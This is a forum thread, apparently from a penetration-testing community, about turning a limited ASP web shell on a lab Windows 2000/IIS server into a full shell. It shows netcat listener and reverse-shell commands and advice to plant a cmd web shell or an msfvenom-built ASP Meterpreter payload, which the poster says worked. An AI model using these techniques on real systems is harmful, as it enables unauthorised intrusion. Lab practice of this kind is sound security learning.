Limited shell

[H1t M0nk3y]

Ok, here's another problem I have had for way too long now and I want to fix.

Here's the scenario: I have got a limited shell on a server in a lab through a web application vulnerability.

By "limited shell", I mean:
- The shell doesn't give me any output on the screen and I cannot output results of commands in a file
- I can change directory and list files (using a second ASP shell), but that's about it.
- I am able to ftp files/modify files into the web root directory (for example, I have uploaded nc.exe in C:\inetpub\wwwroot)

So for example:
C:\Windows\system32>cd ../..     (works)
C:\>cd inetpub\wwwroot    (works)
C:\inetpub\wwwroot> dir    (doesn't display anything)
C:\inetpub\wwwroot> dir > files.txt    (doesn't create a file)
C:\inetpub\wwwroot> nc.exe -lvp 4444    (doesn't work)
C:\inetpub\wwwroot> nc.exe -v 192.168.1.20 4444    (doesn't work either)

I have tried 5 or 6 different ASP shells, but couldn't get much more out of it.

So what approach should I take at this point? Write my own ASP shell code? Focus on trying to get a full shell (for example, using netcat somehow)? Maybe priv escalation (I don't think so at this point, but I could be wrong)

I really just need a direction so I can continue working on a solution...

Thanks

[ziggy_567]

The link below is Linux specific, but there's quite a bit that could be adapted to Windows.

http://pen-testing.sans.org/blog/pen-testing/2012/06/06/escaping-restricted-linux-shells

Also, maybe something in there will click for you and give you some further avenues to explore.

Good luck!

[Dark_Knight]

Ok, here's another problem I have had for way too long now and I want to fix.

Here's the scenario: I have got a limited shell on a server in a lab through a web application vulnerability.

By "limited shell", I mean:
- The shell doesn't give me any output on the screen and I cannot output results of commands in a file
- I can change directory and list files (using a second ASP shell), but that's about it.
- I am able to ftp files/modify files into the web root directory (for example, I have uploaded nc.exe in C:\inetpub\wwwroot)

So for example:
C:\Windows\system32>cd ../..     (works)
C:\>cd inetpub\wwwroot    (works)
C:\inetpub\wwwroot> dir    (doesn't display anything)
C:\inetpub\wwwroot> dir > files.txt    (doesn't create a file)
C:\inetpub\wwwroot> nc.exe -lvp 4444    (doesn't work)
C:\inetpub\wwwroot> nc.exe -v 192.168.1.20 4444    (doesn't work either)

I have tried 5 or 6 different ASP shells, but couldn't get much more out of it.

So what approach should I take at this point? Write my own ASP shell code? Focus on trying to get a full shell (for example, using netcat somehow)? Maybe priv escalation (I don't think so at this point, but I could be wrong)

I really just need a direction so I can continue working on a solution...

Thanks

Are you able to run "net" commands for "net user" etc?

[H1t M0nk3y]

Thanks ziggy_567, I will be reading this tonight!!

Are you able to run "net" commands for "net user" etc?

No, it doesn't work either...

The IIS server is run with a pretty limited user...

[ajohnson]

What shells are you trying to use? What OS and version of IIS are you using?

I've encountered instances where i can blindly execute commands, but I can't think of a time where I was using a web shell and wasn't able to receive output for non-privileged commands.

Here's another collection of shells you might want to try: http://laudanum.inguardians.com/ I'm pretty sure there is at least one ASP-based shell in there.

[H1t M0nk3y]

What shells are you trying to use? What OS and version of IIS are you using?

Microsoft Windows 2000 SP4
Microsoft IIS httpd 5.1
Using ASPshell and zephir4 (tried 3 or 4 others that I don't remember)

But I am not really looking for help to debug this problem. I am more looking at a methodology or links with tricks I could try.

I have already tried something like 25 differents tricks (not all listed here, obviously), but I would like to learn a few other ones.

I might write my own ASP shell code tonight or modify an existing one...

[ajohnson]

Methodology-wise, I'd skip the fancy shells and just see if a basic script works. Something like executing the the value of a GET variable called cmd and output it to the screen. The web service account should at least be about to output a directory listing. If not, there may be something else quirky going on.

[ajohnson]

Also, remember that you can use msfpayload/msfencode or msfvenom to create asp files that contain Meterpreter, reverse shells, etc.

[H1t M0nk3y]

I didn't know that.
I will play with this later today.

Thanks ajohnson

[ajohnson]

This tutorial uses WebDAV as the delivery mechanism, but shows how to create the asp file, which works regardless of how you get it up to the web server: http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.html

[H1t M0nk3y]

I appreciate it ajohnson. Thanks

[H1t M0nk3y]

As an update, the Meterpreter as an ASP payload did the trick.

Other useful information related to this subject:
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,9169.0/
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,5966.msg31666/#msg31666
http://www.room362.com/blog/2012/8/25/post-exploitation-command-lists-request-to-edit.html

Thanks again!